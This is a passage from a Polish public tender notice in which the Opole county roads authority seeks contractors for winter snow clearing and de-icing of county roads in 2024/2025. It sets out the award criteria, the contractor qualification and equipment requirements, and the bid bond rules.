których:<br/>- nie zostanie zaoferowany termin podjęcia usługi ( nie zostanie podany czas w druku oferty) <br/> lub <br/>- będzie on dłuższy niż 1,0 h ( 60 min. ) <br/><br/> zostaną odrzucone na podstawie art. 89 ust. 1 pkt 2 ustawy Pzp.<br/> <br/> Najkorzystniejsza oferta w odniesieniu do tego kryterium może uzyskać maksimum 100 pkt.<br/>2.	Zamawiający uzna za najkorzystniejszą ofertę Wykonawcy, który spełni warunki udziału w postępowaniu, a jego oferta nie będzie podlegać odrzuceniu oraz otrzyma największą liczbę punków wyliczoną zgodnie ze wzorem <br/>∑o = Co* 0,60 + To* 0,40, gdzie:<br/> ∑o – łączna ilość punktów dla ocenianej oferty,<br/>Co – liczba punktów przyznana ofercie ocenianej w kryterium „cena oferty”,<br/>To – liczba punktów przyznana ofercie ocenianej w kryterium „termin podjęcia usługi”.<br/>3.	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający wybiera pośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>4. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną.<br/>5. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w pkt. 19.4. zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>6. Jeżeli w przypadku o którym mowa w pkt. 19.5 zostały złożone oferty dodatkowe <br/>o takiej samej cenie zamawiający unieważnia postępowanie zgodnie z art. 255 <br/>pkt 4 ustawy Pzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin podjęcia usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie w sezonie zimowym 2024/2025 usług związanych z zimowym utrzymaniem dróg powiatowych administrowanych przez ZDP Opole - na terenie gmin Niemodlin <br/>i Tułowice- ( O.D. Dąbrowa ).<br/>1. Opis i zakres zamówienia:<br/>Zamówienie obejmuje usługi w zakresie zimowego utrzymania dróg powiatowych przy odśnieżaniu i usuwaniu śliskości na terenie gmin Niemodlin i Tułowice (Obwód Drogowy <br/>w Dąbrowie). Szczegółowy opis, zakres i warunki wykonywania usług zawierają załączniki:<br/>a) „Wykaz dróg powiatowych objętych i nie objętych zimowym utrzymaniem<br/> w sezonie 2024/2025” – poz. 15-30 oraz 34-40 w OD nr 1 Dąbrowa,<br/>b)	Specyfikacje Techniczne (ST).<br/>2. Informacje dodatkowe dot. zamówienia:<br/>2.1.Zarząd Dróg Powiatowych w Opolu zapewnia:<br/>a)	materiały uszorstniające z dowozem na plac magazynowy Wykonawcy,<br/>b)	dyżur osobowy (dyżurny AZ).<br/>2.2. Wykonawca zapewni:<br/>a)	plac magazynowy o wymiarach 150 m2 na materiały uszorstniające (mat. dostarczane przez Zamawiającego) położony w dowolnej gminie leżącej po lewobrzeżnej części rzeki Odry lecz w odległości nie większej niż 35 km od głównego składowiska (Opole - Bierkowice) umożliwiający szybkie reagowanie - spełniający wymogi z zakresu ochrony środowiska, <br/>b)	pryzmowanie materiałów uszorstniających,<br/>c)	załadunek materiałów uszorstniających na piaskarko-solarki,<br/>zaplecze sprzętowo-warsztatowe (obsługę warsztatową jednostek sprzętowych umożliwiającą szybkie reagowanie i utrzymywanie sprzętu w stałej sprawności technicznej). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-11-01 do 2025-04-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielania zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp. <br/><br/>Dopuszcza się możliwość udzielenia w okresie 3 lat (wybranemu w niniejszym postępowaniu wykonawcy usług podstawowych) zamówień podobnych, polegających na powtórzeniu tego samego rodzaju usług jakie obejmuje niniejsze postępowanie <br/>(do 50 % wartości szacowanej usług podstawowych) – w przypadku zaistnienia potrzeby zwiększenia zakresu przedmiotowych usług i posiadania środków na ich sfinansowanie – dotyczy osobno każdej z części.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące kryteria oceny ofert:<br/>a)	kryterium „cena oferty” (C) – waga kryterium - 60%<br/>b)	kryterium „termin podjęcia usługi” (T) – waga kryterium - 40%<br/><br/>1.1.	Kryterium „cena oferty” (C) - waga 60 %<br/>Kryterium „cena oferty” będzie rozpatrywana na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w Ofercie. Ilość punktów w tym kryterium zostanie obliczona na podstawie wzoru C = Cmin / Co x 100 pkt, gdzie:<br/>C – liczba punktów przyznana ofercie ocenianej w kryterium „cena oferty”,<br/>Cmin – cena brutto oferty najtańszej,<br/>Co – cena brutto oferty ocenianej.<br/>Najkorzystniejsza oferta w odniesieniu do tego kryterium może uzyskać maksimum 100 pkt.<br/>1.2.	Kryterium „termin podjęcia usługi” (T) ( od momentu zawiadomienia Wykonawcy przez Zamawiającego o potrzebie usługi ) – waga 40 %<br/> Kryterium „termin podjęcia usługi (T)” oceniane będzie na podstawie czasu podjęcia usługi od momentu zawiadomienia przez Zamawiającego o potrzebie usługi, wskazanego w godzinach i minutach – zadeklarowanego przez Wykonawcę w pkt. 2.1 lit. b, 2.2 lit. b lub 2.3 lit. b Formularza Oferty (w zależności od części na którą składana jest oferta). Zamawiający w kryterium „termin podjęcia usługi” będzie przyznawał punkty, <br/> następująco:<br/><br/> 1. deklarowanie podjęcia usługi w ciągu 0,5 godz - 100 pkt <br/> 2. deklarowanie podjęcia usługi w ciągu 1,0 godz - 0 pkt <br/><br/>UWAGA! <br/>Wykonawca może zaproponować czas podjęcia usługi jedynie 0,5 godz. lub najdłuższy czas 1,0 godzina od zawiadomienia przez zamawiającego o potrzebie wykonania usługi.<br/><br/>Jeżeli Wykonawca zaproponuje termin podjęcia usługi w czasie krótszym niż 0,5 godziny to do oceny takiej oferty zostanie przyjęty czas 0,5 godz. i taki termin podjęcia usługi zostanie uwzględniony w Umowie z Wykonawcą. <br/>	<br/> Oferty, w których:<br/>- nie zostanie zaoferowany termin podjęcia usługi ( nie zostanie podany czas w druku oferty) <br/> lub <br/>- będzie on dłuższy niż 1,0 h ( 60 min. ) <br/><br/> zostaną odrzucone na podstawie art. 89 ust. 1 pkt 2 ustawy Pzp.<br/> <br/> Najkorzystniejsza oferta w odniesieniu do tego kryterium może uzyskać maksimum 100 pkt.<br/>2.	Zamawiający uzna za najkorzystniejszą ofertę Wykonawcy, który spełni warunki udziału w postępowaniu, a jego oferta nie będzie podlegać odrzuceniu oraz otrzyma największą liczbę punków wyliczoną zgodnie ze wzorem <br/>∑o = Co* 0,60 + To* 0,40, gdzie:<br/> ∑o – łączna ilość punktów dla ocenianej oferty,<br/>Co – liczba punktów przyznana ofercie ocenianej w kryterium „cena oferty”,<br/>To – liczba punktów przyznana ofercie ocenianej w kryterium „termin podjęcia usługi”.<br/>3.	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający wybiera pośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>4. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną.<br/>5. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w pkt. 19.4. zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>6. Jeżeli w przypadku o którym mowa w pkt. 19.5 zostały złożone oferty dodatkowe <br/>o takiej samej cenie zamawiający unieważnia postępowanie zgodnie z art. 255 <br/>pkt 4 ustawy Pzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin podjęcia usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają nw. warunki <br/> udziału dotyczące:<br/><br/><br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa żadnych warunków w tym zakresie.<br/><br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie określa żadnych warunków w tym zakresie.<br/><br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Wykonawca musi posiadać średni roczny przychód w obszarze objętym zamówieniem tj. w zakresie usług zimowego utrzymania, za ostatnie 3 lata obrotowe, <br/>a jeżeli okres prowadzenia działalności jest krótszy – za ten okres w wysokości <br/>co najmniej: 15.000,- zł dla każdej części (tzn. dla dwóch części 30.000 zł, a dla trzech części 45.000 zł).<br/><br/>UWAGA:<br/>Wartości podane w dokumentach potwierdzających spełnianie warunku <br/>w walutach innych niż wskazana przez Zamawiającego powyżej Wykonawca przeliczy - dla „przychodu” według średniego kursu NBP na dzień zakończenia roku obrotowego.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - warunek określony powyżej musi spełniać jeden z Wykonawców.<br/><br/>W celu potwierdzenia spełniania powyższego warunku zgodnie z zapisami <br/>art. 274 ust. 1 ustawy Pzp Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, oświadczenia Wykonawcy o przychodzie sporządzonego według wzoru stanowiącego załącznik nr 3.6. do niniejszej SWZ.<br/>4) zdolności technicznej lub zawodowej:<br/>a) Wykonawca musi wykazać, że w okresie ostatnich 3 sezonów zimowych (2021/2022, 2022/2023, 2023/2024), przed upływem terminu składania ofert, <br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał lub wykonuje usługi w zakresie zimowego utrzymania dróg o łącznej wartości co najmniej 45.000,- zł dla każdej z części dla której będzie składana oferta (tzn. dla dwóch części 90.000 zł, a dla trzech części 135.000 zł).<br/><br/>- co winno być potwierdzone stosownymi dokumentami stwierdzającymi, że usługi te zostały prawidłowo wykonane i ukończone, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane.<br/><br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi Wykonawcami, Wykaz wykonanych usług (załącznik nr 3.8. do SWZ) winien dotyczyć usług, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/><br/>UWAGA:<br/>Wartości podane w dokumentach potwierdzających spełnianie warunku <br/>w walutach innych niż wskazana przez Zamawiającego powyżej Wykonawca przeliczy według średniego kursu NBP na dzień zakończenia realizacji usługi, <br/>a w przypadku usług wykonywanych na dzień składania ofert;<br/><br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 ustawy Pzp) - warunek określony powyżej musi spełniać jeden <br/>z Wykonawców, w których wykonaniu bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonaniu bezpośrednio uczestniczył lub uczestniczy.<br/>W celu potwierdzenia spełniania powyższego warunku zgodnie z zapisami <br/>art. 274 ust. 1 ustawy Pzp Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, wykazu wykonanych usług sporządzonego według wzoru stanowiącego załącznik nr 3.8. do niniejszej SWZ.<br/><br/>Wraz z załącznikiem nr 3.8. Wykonawca składa dowody określające, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty.<br/><br/>b) Wykonawca dysponuje lub będzie dysponował podczas realizacji zamówienia osobami posiadającymi kwalifikacje i doświadczenie w zakresie zimowego utrzymania dróg, którzy pracowali co najmniej w 2 (dwóch) sezonach zimowych w okresie ostatnich 3 sezonów (2021/2022, 2022/2023, 2023/2024) – dla każdej <br/>z części (dla której będzie składana oferta) kompletną obsadę osobową <br/>nie zaangażowaną na innych częściach niniejszego zamówienia, jak również zamówienia nr AO.261.1.14.2024.EW dotyczącego zimowego utrzymania dróg <br/>w sezonie zima 2024/2025 na drogach Zarządu Dróg Powiatowych w Opolu. Wykonawca przedstawi wraz z ofertą osoby spełniające wymienione poniżej wymagania, w tym co najmniej: <br/><br/> Część 1 <br/> - operator sprzętu (kierowca nośnika) - 4 osoby<br/><br/> Część 2 <br/> - operator sprzętu (kierowca nośnika) - 3 osoby<br/><br/> Część 3 <br/> - operator sprzętu (kierowca nośnika) - 4 osoby <br/> - operator ładowarki - 1 osoba<br/><br/>W przypadku Wykonawców wspólnie ubiegających się o realizację zamówienia (art. 58 ustawy Pzp) wyżej opisany warunek udziału w postępowaniu Wykonawcy mogą wykazać łącznie razem lub co najmniej jeden z nich.<br/><br/>W celu potwierdzenia spełniania powyższego warunku zgodnie z zapisami <br/>art. 274 ust. 1 ustawy Pzp Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, wykazu osób sporządzonego według wzoru stanowiącego załącznik nr 3.7. do niniejszej SWZ.<br/><br/>c)	Wykonawca dysponuje lub będzie dysponował w pełni sprawnymi jednostkami transportowymi i sprzętowymi nie zaangażowanymi przy innych częściach <br/>(dla każdej części inna jednostka sprzętowa) niniejszego zamówienia, jak również zamówienia nr AO.261.1.14.2024.EW dotyczącego zimowego utrzymania dróg <br/>w sezonie zima 2024/2025 na drogach Zarządu Dróg Powiatowych w Opolu, wymienionymi poniżej:<br/><br/> Część 1<br/> - pługi lekkie minimum - 2 szt<br/> - pługi średnie minimum - 2 szt<br/> - piaskarko-solarki minimum - 3 szt<br/> - nośniki do w/w pługów i piaskarko – solarek minimum - 4 szt<br/> Część 2<br/> - pługi średnie minimum - 2 szt<br/> - piaskarko-solarki minimum - 1 szt<br/> - nośniki do w/w pługów i piaskarko – solarek minimum - 2 szt <br/><br/> Część 3<br/> - pługi lekkie minimum - 2 szt<br/> - pługi średnie minimum - 2 szt<br/> - piaskarko-solarki minimum - 2 szt<br/> - nośniki do w/w pługów i piaskarko – solarek minimum - 4 szt<br/> - ładowarka minimum - 1 szt <br/> oraz <br/> - dysponować placem magazynowym o wym. minimum - 150 m2<br/><br/>W przypadku Wykonawców wspólnie ubiegających się o realizację zamówienia (art. 58 Pzp) wyżej opisany warunek udziału w postępowaniu Wykonawcy mogą wykazać łącznie razem lub co najmniej jeden z nich.<br/>W celu potwierdzenia spełniania niniejszego warunku zgodnie z zapisami art. 274 ust. 1 ustawy Pzp Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, Wykazu narzędzi, wyposażenia zakładu dostępnych Wykonawcy w celu wykonania zamówienia publicznego sporządzonego według wzoru stanowiącego załącznik nr 3.9. do niniejszej SWZ.<br/><br/>2. W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/><br/>3. Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. w celu potwierdzenia braku podstaw do wykluczenia Wykonawcy z udziału <br/>w postępowaniu:<br/>a) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>b) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/>o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia <br/>z postępowania wskazanych przez Zamawiającego, o których mowa w art. 109 ust. 1 pkt 6 ustawy Pzp.<br/>1.a W przypadku, gdy Wykonawca, którego oferta zostanie najwyżej oceniona (jako najkorzystniejsza), polega na zdolnościach lub sytuacji innych podmiotów zgodnie <br/>z art. 118 ustawy Pzp, w celu potwierdzenia braku podstaw do wykluczenia z udziału <br/>w postępowaniu tego podmiotu należy złożyć na wezwanie Zamawiającego <br/>w odniesieniu do tych podmiotów:<br/>a) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>b) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/>o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia <br/>z postępowania wskazanych przez Zamawiającego, o których mowa w art. 109 ust. 1 pkt 6 ustawy Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) oświadczenia Wykonawcy o przychodzie Wykonawcy w obszarze objętym zamówieniem, za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy – za ten okres, potwierdzające spełnienie warunku, o którym mowa w pkt 7.2 ppkt 3 IDW;<br/>b) wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 sezonów zimowych (2021/2022, 2022/2023, 2023/2024), a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania <br/>i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, potwierdzające spełnienie warunku, o którym mowa w pkt 7.2 ppkt 4 lit. a IDW oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione <br/>w okresie ostatnich 3 miesięcy;<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi Wykonawcami, wykaz o którym mowa powyżej, dotyczy usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył, <br/>a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.<br/>c) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, potwierdzające spełnienie warunku, o którym mowa w pkt 7.2 ppkt 4 lit. b IDW;<br/>d) wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją <br/>o podstawie do dysponowania tymi zasobami, potwierdzające spełnienie warunku, <br/>o którym mowa w pkt 7.2 ppkt 4 lit. c IDW.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca jest zobowiązany do wniesienia wadium ( na części na które składana jest oferta ) w wysokości:<br/>Część Nr 1 - 1 950,00 zł<br/>( słownie złotych: jeden tysiąc dziewięćset pięćdziesiąt złotych 00/100 ),<br/>Część Nr 2 - 900,00 zł<br/>( słownie złotych: dziewięćset złotych 00/100 ),<br/>Część Nr 3 - 1 700,00 zł<br/>( słownie złotych: jeden tysiąc siedemset złotych 00/100 ).<br/>2.	Wadium musi być wniesione przed upływem terminu składania ofert i utrzymane nieprzerwanie do dnia upływu terminu związania ofertą z wyjątkiem przypadków, <br/>o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust 2 ustawy Pzp.<br/> Wadium może być wniesione wg wyboru wykonawcy w jednej lub kilku następujących formach, w zależności od wyboru Wykonawcy:<br/>a) pieniądzu, przelewem na rachunek bankowy;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2023 r., poz. 462).<br/>Nazwa beneficjenta: <br/>Powiat Opolski – Zarząd Dróg Powiatowych w Opolu<br/> 45-005 Opole, ul. Książąt Opolskich 27<br/><br/>Wadium wnoszone w pieniądzu należy dokonać przed terminem składania ofert przelewem na rachunek Zamawiającego nr 94 1020 3668 0000 5902 0015 8857 <br/>z dopiskiem: <br/>„ZIMA 2024-2025 z podziałem na trzy części – cz. nr 1*2*3*” <br/>lub	<br/> „Wadium - zam. publ. nr AO.261.1.15.2024.EW – cz. nr 1*2*3*”,<br/><br/>a dowód przelewu złożyć wraz z ofertą.<br/>* - niepotrzebne skreślić<br/>3.	Wadium wnoszone w formie poręczeń lub gwarancji powinno być złożone w oryginale w postaci elektronicznej i musi obejmować cały okres związania ofertą. <br/>W przypadku wniesienia wadium w formie gwarancji lub poręczenia koniecznym jest, aby gwarancja lub poręczenie obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę wadium, określone w art. 98 ust. 6 ustawy Pzp. <br/>Gwarancja lub poręczenie musi zawierać w swojej treści nieodwołalne i bezwarunkowe zobowiązanie wystawcy dokumentu do zapłaty na rzecz Zamawiającego kwoty wadium. <br/>Wadium wniesione w formie gwarancji (bankowej czy ubezpieczeniowej) musi mieć taką samą płynność jak wadium wniesione w pieniądzu – dochodzenie roszczenia z tytułu wadium wniesionego w tej formie nie może być utrudnione. Dlatego w treści gwarancji powinna znaleźć się klauzula stanowiąca, iż wszystkie spory odnośnie gwarancji będą rozstrzygane zgodnie z prawem polskim przez sądy powszechne. W przypadku gdy Wykonawca wnosi wadium w formie gwarancji lub poręczenia w języku innym niż język polski, dokument gwarancji lub poręczenia należy złożyć wraz z tłumaczeniem na język polski. <br/>4.	Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na wskazany w ppkt. 16.2 lit. a IDW rachunek bankowy Zamawiającego, najpóźniej przed upływem terminu składania ofert. O wpłaceniu wadium w formie pieniężnej <br/>w wymaganym terminie decyduje data i godzina wpływu środków na rachunek bankowy Zamawiającego dlatego ze względu na ryzyko związane z czasem trwania okresu rozliczeń międzybankowych Zamawiający zaleca dokonanie przelewu ze stosownym wyprzedzeniem. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki, bądź wszyscy wspólnicy podpiszą ofertę.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia przedłożą wraz z ofertą stosowne pełnomocnictwo. Nie dotyczy to spółki cywilnej, o ile upoważnienie/ pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki, bądź wszyscy wspólnicy podpiszą ofertę.<br/>Pełnomocnictwo, o którym mowa powyżej, może wynikać albo z dokumentu pod taką nazwą albo z umowy podmiotów wspólnie składających ofertę (dołączonej do oferty).<br/>3. Oferta musi być podpisana w taki sposób, aby prawnie zobowiązywała wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp składa każdy <br/>z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. Żaden z Wykonawców wspólnie składających ofertę nie może podlegać wykluczeniu z postępowania, co oznacza, iż oświadczenie w tym zakresie musi złożyć oddzielnie każdy z Wykonawców składających ofertę wspólną. Oświadczenie <br/>o spełnianiu warunków udziału składa podmiot, który w odniesieniu do danego warunku udziału w postępowaniu potwierdza jego spełnianie.<br/>5. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty 